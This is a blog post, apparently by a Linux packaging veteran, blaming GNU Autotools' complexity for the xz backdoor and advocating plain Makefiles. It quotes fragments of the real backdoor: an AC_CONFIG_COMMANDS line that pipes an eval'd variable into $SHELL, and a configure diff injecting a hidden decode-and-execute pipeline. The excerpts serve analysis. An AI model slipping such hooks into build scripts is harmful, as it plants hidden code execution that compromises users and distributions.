xz backdoor and autotools insanity

I’ve been arguing for more than a decade now that GNU Autotools is too complicated, unnecessary, and stupid. The latest xz backdoor simply adds more fuel to the fire.

First a little bit of background. I have been doing package-related stuff for Linux for more than 20 years now. I’m competent with Debian, RPM and Arch Linux packaging systems, in addition to compiling my whole system by hand (LFS) and cross compiling systems for embedded devices (buildroot). I’ve also maintained Windows installers.

Additionally I have experience with autotools, make, ninja, and several custom build systems.

So I have a good idea how libraries are supposed to be built, but in my experience virtually no one knows how to do it. Here you’ll see a clear example of that.

This article is not about the backdoor itself, plenty of researchers are surely working on that. This is about what enabled the introduction of the backdoor in the first place and how to ensure it never happens again.

If the xz project had not been using autotools, installing the backdoor would not have been possible. It’s as simple as that.

GNU Autotools primer

In order to understand how the backdoor was so easily introduced, you need to understand what autotools is in the first place. Basically it’s a build system, but an unnecessarily complex one.

I’m going to describe the typical sequence of steps so you get a rough idea:

  1. Run autogen.sh script (generates configure)
  2. Run configure script (generates Makefile files)
  3. Run make
  4. Run make install

Now, even though an autogen.sh script is typical, it’s not necessary, and most of the time you can just run autoreconf --force --install and that would basically do the same thing.
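
Put together, the whole dance from a git checkout looks roughly like this (a sketch; details vary per project):

autoreconf --force --install   # generate configure from configure.ac (and Makefile.in from Makefile.am)
./configure                    # probe the system, generate Makefile from Makefile.in
make                           # build
make install                   # install the results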

Once everything is in place, you can run the configure script, which performs a battery of runtime checks to detect the features your system has; its main purpose is to generate the Makefile files so you can do the next step.

Now, I’m going to spoil the surprise and tell you that it’s at this step that the backdoor is introduced, specifically this line:

AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])

They did a good job of hiding what this actually does behind several levels of indirection, but essentially the command is in gl_localedir_config, a variable they themselves introduced by naming it gl_[$1]_config ($1 being localedir).
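
Substituting the arguments by hand, the net effect when configure runs is roughly this (a sketch of the expansion, not the literal generated code):

gl_config_gt="eval \$gl_localedir_config"   # the third argument, with $1 = localedir
eval $gl_config_gt | $SHELL 2>/dev/null     # run whatever gl_localedir_config holds as a shell script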

Then you do make and make install, but by that point the code has already been tampered with.

Why did nobody catch this?

Yes, it was obfuscated, but eval $anything | $SHELL seems highly suspicious, even to my eyes untrained in security analysis. Are open source developers blind?

The “magic” of autotools

One really cool feature of autotools is that you don’t have to do every step every time. One person runs autoreconf on one machine, which generates the configure script, and then packages the result so that everyone else can just run the script, even if they don’t have autotools installed.

One machine might run ./configure and figure out that ifunc is not available, but on another machine it would be.

So the configure script is generic, but the resulting Makefiles would be different in different machines. Therefore when you do make dist, the Makefiles are not included in the tarball, only the configure script, which is generated from configure.ac.
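
The two sides of that workflow look something like this (a sketch; the tarball name is illustrative):

# maintainer, autotools required:
autoreconf --force --install
./configure && make dist       # the tarball ships configure, but no Makefiles

# user, no autotools required:
tar -xf hello-1.0.tar.gz && cd hello-1.0
./configure && make            # the Makefiles are generated here, for this machine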

Pretty neat, right?

No, and we’ll soon see why it isn’t. But long story short: if the tarball xz-5.6.1.tar contains generated files that are not part of the git repository, what stops a malicious actor from modifying those files? Nothing. Distributions have to trust that the people who created the tarball did not include anything beyond what make dist on a clean git checkout would produce, and that’s extremely hard to check.
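
To even attempt such a check you would have to do something like the following (a sketch; the paths are illustrative, and in practice the diff is full of noise):

git clone https://github.com/tukaani-project/xz.git && cd xz
git checkout v5.6.1
autoreconf --force --install
./configure && make dist                     # regenerate a "clean" tarball
mkdir -p /tmp/clean /tmp/official
tar -xf xz-5.6.1.tar.gz -C /tmp/clean
tar -xf /path/to/official/xz-5.6.1.tar.gz -C /tmp/official
diff -r /tmp/clean /tmp/official             # good luck separating noise from malice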

One of those files is m4/build-to-host.m4, which is supposed to come from gnulib and be copied when you run autoreconf --install, but the nefarious actors modified it. This is the file a lot of analysts are mentioning, because it’s the one where the modifications are easier to spot, but it’s not really the dangerous part, since the user is not going to run it. The dangerous modification is in the configure script, which is the one users are going to run.

For example, a Debian maintainer might decide to run make dist on his machine, compare the result with the official tarball, and see that the configure script is different. But that could be because the official tarball was generated with a newer version of autoconf, or gnulib, or whatever. So the fact that it’s different could be totally benign.

In my experience the files generated by autotools are drastically different in different machines because everyone is using different versions of those tools.

The convenience of autotools — which generates a configure script which doesn’t require autotools or a development version of gnulib in order to run — is biting us in the ass.

So: configure.ac contains the line AM_GNU_GETTEXT([external]); that macro lives in m4/gettext.m4 and calls gl_BUILD_TO_HOST([localedir]); that macro in turn lives in m4/build-to-host.m4. The malicious actors inserted code into that macro, then ran autoreconf, which generated the configure script that installs their backdoor.
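
Flattened out, the chain looks like this:

# configure.ac:             AM_GNU_GETTEXT([external])
#  -> m4/gettext.m4:        gl_BUILD_TO_HOST([localedir])
#   -> m4/build-to-host.m4: the macro the attackers modified
# autoreconf then bakes the whole expansion into ./configure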

The only reason this was possible in the first place is that GNU Autotools is so horrendously complex that nobody really checks the mess it generates.

Even in an uncompromised tree, the resulting configure script is 25,697 lines of obfuscated shell script. Good luck finding anything malicious there.

The malicious developers did not even have to include their m4/build-to-host.m4 in the tarball, because the configure script already contained the tainted code. But if some maintainer ran the autogen.sh script, configure would be regenerated from the benign version; including the m4 script ensures that even in that case the backdoor remains. Even if you do aclocal --force --install, the malicious m4 script still remains (for some reason aclocal doesn’t copy scripts that already exist).

Totally unnecessary

The saddest part of this saga is that autotools is not needed at all. It doesn’t serve any purpose.

Let’s create a simple library:

#include <hello.h>

const char *hello(void)
{
	return "hello";
}

We follow the steps to build a library with libtool and gettext, and then we do make dist. The resulting files in the tarball contain 52,466 lines: that’s more than fifty thousand lines to build a library with a single function.

All we really needed to build the library was this:

gcc -shared -I. -fPIC main.c -Wl,-soname,libhello.so.0 -o libhello.so.0
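
And to actually use it, a couple more commands suffice (a sketch; test.c is a hypothetical program calling hello()):

ln -sf libhello.so.0 libhello.so     # development symlink so -lhello resolves
gcc -I. test.c -L. -lhello -o test   # link a test program against the library
LD_LIBRARY_PATH=. ./test             # run it without installing anything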

What on Earth is autotools doing? OK, here’s one check:

checking for gcc option to enable C11 features... none needed

Judging from the dozens of lines of pretty undecipherable code, it seems this is trying to compile a C program with C11 features — like anonymous structs — without specifying any flags; if that fails, it tries again with -std=gnu11, and if that succeeds, it uses that flag for the rest of the compilation.

Why? I’m not using C11, and I never told autotools to ensure support for C11.

Imagine the billions of unnecessary checks autotools is doing on god knows how many package builds.

OK, maybe I’m being unfair, maybe there are cases where these checks are necessary, for example when cross compiling to other architectures… But that’s actually my area of expertise, and in fact autotools makes cross compilation more difficult. Projects like scratchbox2 were created precisely to deal with code which relies on autotools’ runtime checks too much. Just google “cannot run test program while cross compiling”.

Back when I was working on the Nokia N9, I wrote a blog post precisely to explain why we were using scratchbox, and it starts with a case where the configure script failed on ARM cross compilation. The solution was to manually set the characteristics of the system, for example ac_cv_func_posix_getgrgid_r=yes. But if we have to manually specify that the system has a POSIX-conformant getgrgid_r, we might as well do it in a Makefile:

make HAVE_POSIX_GETGRGID_R=yes

That’s in fact how you pass configuration to git’s build system, which is just Makefiles: make NO_POSIX_GOODIES=UnfortunatelyYes. And this is set by default for Windows, so you don’t actually need to specify it.
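
For comparison, the autoconf way is to pre-seed the cache before configure runs (a sketch; the toolchain triplet is illustrative):

ac_cv_func_posix_getgrgid_r=yes \
./configure --host=arm-linux-gnueabi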

Thanks for nothing, autotools.

Solve stupid problems

Let’s take a look at one configuration autoconf generates for xz:

/* The size of 'size_t', as computed by sizeof. */
#define SIZEOF_SIZE_T 8

What is wrong with sizeof(size_t)?

Well, according to the generated comment, HP’s C compiler HP92453-01 B.11.11.23709.GP has a bug interpreting declarations like int a3[[(sizeof (unsigned char)) >= 0]], so a cast to long int is needed to get the correct number. Right, but that was in 2001; why are we forcing thousands of packages to do this unnecessary check? Maybe it’s already fixed. Even if it’s not, SIZEOF_SIZE_T is only used to compute SIZE_MAX when that isn’t already defined, and it may well be defined even on HP’s buggy compiler. And this has nothing to do with sizeof() inside an array declaration anyway. Even if sizeof(size_t) somehow failed, that’s a problem for them: if anyone actually tries to compile xz for that platform, they can just patch the source code. Why does everyone need to check this?
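
For reference, configure computes such sizes without running anything by abusing the fact that a negative array size is a compile error. A sketch of the technique (not the literal generated test):

cat > conftest.c <<'EOF'
#include <stddef.h>
int test_array[(sizeof(size_t) >= 8) ? 1 : -1];  /* negative size = compile error */
EOF
gcc -c conftest.c && echo "sizeof(size_t) is at least 8"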

You don’t put “careful, the coffee is hot” on every cup of coffee just because one time a person burned herself.

No. Don’t design for the lowest common denominator. It’s prematurely worrying about something that will never happen.

“I make up problems, and then I write overly complicated crap code to solve them.”

Linus Torvalds

Worry when somebody actually has an issue compiling xz with an HP C compiler.

A simple Makefile can build liblzma just fine. As a proof of concept I created one in my own liblzma project: Makefile. It builds and works perfectly fine; more fine-tuning would be needed to support more configurations, but it’s not bad for a couple of hours of work.

The origin of the backdoor

After playing around with xz’s build system, it is now clear to me what started everything.

// Set up the locale and message translations.
tuklib_gettext_init(PACKAGE, LOCALEDIR);

In order to properly set up the translations, we need to specify the location of the translated files. On my system that location is “/usr/share/locale”. The way you are supposed to define this variable is with a C compiler flag like -DLOCALEDIR=\"/usr/share/locale\", and that’s what xz does: -DLOCALEDIR=\"$(localedir)\".

But according to GNU’s gettext manual, it should be -DLOCALEDIR=$(localedir_c_make). Here’s part of a generated Makefile:

prefix = /usr
datarootdir = ${prefix}/share
localedir = ${datarootdir}/locale
localedir_c = "/usr/share/locale"
localedir_c_make = \"$(localedir)\"

We can clearly see that these two things are equivalent.
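
Either way, what the compiler ultimately sees is just this (a sketch; main.c stands for any file using LOCALEDIR):

gcc -DLOCALEDIR='"/usr/share/locale"' -c main.c   # LOCALEDIR expands to a C string literal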

gnulib’s m4 macro build-to-host.m4 is trying to help by adding the quotes automatically. This is part of the generated configure script:

localedir_c=`printf '%s\n' "$gl_final_localedir" | sed -e "$gl_sed_double_backslashes" -e "$gl_sed_escape_doublequotes" | tr -d "$gl_tr_cr"`
localedir_c='"'"$localedir_c"'"'
localedir_c_make=`printf '%s\n' "$localedir_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
if test "$localedir_c_make" = '\"'"${gl_final_localedir}"'\"'; then
	localedir_c_make='\"$(localedir)\"'
fi
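
Strip away the sed and tr incantations and all of that boils down to this (a sketch that ignores the backslash and carriage-return edge cases):

localedir_c="\"$localedir\""          # wrap the path in C double quotes
localedir_c_make='\"$(localedir)\"'   # the same thing, escaped for make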

And right there is where the malicious actors slipped in the beginning of their exploit:

--- a/configure
+++ b/configure
@@ -4,3 +4,8 @@
 if test "$localedir_c_make" = '\"'"${gl_final_localedir}"'\"'; then
 	localedir_c_make='\"$(localedir)\"'
 fi
+if test "x$gl_am_configmake" != "x"; then
+	gl_localedir_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null'
+else
+	gl_localedir_config=''
+fi

Weirdly enough the malicious code does look eerily similar to the benign code, because both are unnecessarily obfuscated.

This is not some weird macro only xz was using: every autotools project that uses gettext’s translations via AM_GNU_GETTEXT() has it. But even if the whole industry started assiduously checking build-to-host.m4 for modifications, bad actors could simply modify another macro, or just the configure script.

All this just to add quotes to a variable xz’s build system isn’t even using.

How is this not insane?

Ain’t nobody got time for that

I do not blame Debian package maintainers nor xz developers for not spotting the malicious m4 code: m4 is horrible.

Here is a completely benign m4 fix I sent to the zsh developers: autoconf: prepare for 2.70.

Did anybody review that code carefully? Even I didn’t want to review my own code a couple of months later.

I blame them for using autotools. That’s their mistake. Nobody has the time to review the mess these tools generate.

No hope

At this point you should be able to see the level of insanity that autotools brings, and the solution is simple: stop using it. There are better build systems like CMake or Meson (at least that’s what I’m told), but in fact plain Makefiles are superior.

I was already arguing this back in 2010 and nobody listened. I created an entire project (libpurple-mini) just to be able to cross compile libpurple with a simple Makefile rather than their autotools system, and that way easily link another project to the cross-compiled library. Did the libpurple developers move away from autotools? No, they decided to maintain two build systems, because autotools wasn’t good for Windows. The second build system was Makefiles. So: Makefiles for Windows, and autotools for everything else. Why not Makefiles for everything, especially since I had already created them for Linux?

Don’t ask me.

Oh yeah, autotools is supposed to help portability, but it relies on tools that are not easily available on Windows, and it forks many processes, which Windows is notoriously bad at handling. That’s why you are better off using Makefiles on Windows.

One of the highlighted aspects of this saga is the burnout of open source developers who create great tools entirely for free. That is what pressured the maintainer of xz to trust a malicious developer, isn’t it?

In my opinion Lasse Collin should have kept hold of the reins and let the project stagnate if he didn’t have the time to properly review changes. That’s better than hastily accepting contributors.

But that is what I did with my git-remote-hg project — which I authored and worked on entirely for free for years — and as a result of my caution Debian decided to package a fork instead: Debian’s git-remote-hg is somebody else’s code. Yes, Debian maintainers, you know more than the author of git-remote-hg about what’s best for git-remote-hg, just like you know better than the OpenSSH developers what’s safe to link to (if they hadn’t linked OpenSSH with libsystemd, the hack would not have been possible).

The truth is that as an open source maintainer working for free you can’t win.

Some may be thinking that I dislike open source, but it’s the complete opposite. I just think 99% of it is badly maintained. And no: closed source is not maintained any better.

Cargo cult

I remember a story about a daughter replicating her mom’s chicken recipe, which involved cutting off part of the chicken. When her husband asked why, she didn’t know what to answer. When she eventually asked her mom, the answer was “because the chicken doesn’t fit in my pot”.

The term cargo cult comes from the islands of Melanesia, where, after the Westerners left and no more planes were coming, people built mock airplane-marshaling gear out of coconuts in the hope that planes full of cargo would return.

These Melanesians did not know why the airplane marshals did what they did; they simply repeated their actions.

And that’s the reason people keep using autotools and other complex build systems: nobody stops to think “why do I need this?” Everyone just repeats what everyone else is doing. Just do whatever Stack Overflow says, right?

GNU software is the epitome of cargo cult, that’s why their shell scripts are riddled with checks like:

test "x$foo" = xyes

Unless you live in 1995, the x-hack is not necessary, and even in the cases where it was, the problem was $foo containing special characters, not comparing against a plain string like “yes” or “no”.
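
On any remotely modern shell, the plain comparison works just as well:

test "x$foo" = xyes   # the x-hack
test "$foo" = yes     # equivalent on any post-1995 shell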

GNU developers would rather keep doing things like they were done in the 1990s (although even then it was a bad practice) and complicate billions of scripts rather than think for two seconds and ask why they are doing that.

Let’s all keep doing what we have been doing for decades and never question why.

What’s the worst thing that could happen?

Comments

  1. What tools have you actually designed that caused significant impact in helping build thousands of programs that are currently running?
    And probably mission critical?
    From the superficiality of your “article”, I guess none!

  2. On an existing established project, keeping autotools and other complex build systems is not a cargo cult but done primarily because porting the necessary old checks and tests to a new system is a lot of work. Many may be obsolete but removing them can require a certain amount of care if you don’t want to break builds for users on more unusual platforms. Something like zsh deals with enough lower level system things like resource limits and signals that it needs some sort of checks at build time. Meson can probably handle that but replicating it would be work, and the first step to doing that is to identify all the crap like special-cases for 2001-era compilers to strip. If, as a developer, you still have users on AIX, HP-UX and Solaris but don’t have access to such systems yourself, then it can be tricky to test changes.

    But, I’d agree there’s no good reason for using autoconf on a brand new project today.

  3. This is a myth. Git compiles perfectly fine on fringe platforms like Solaris and AIX without any checks, just a simple Makefile.

    This is an appeal to incredulity fallacy: “I don’t see how X could compile without checks”. The fact that you don’t see how it could be possible doesn’t mean it isn’t.
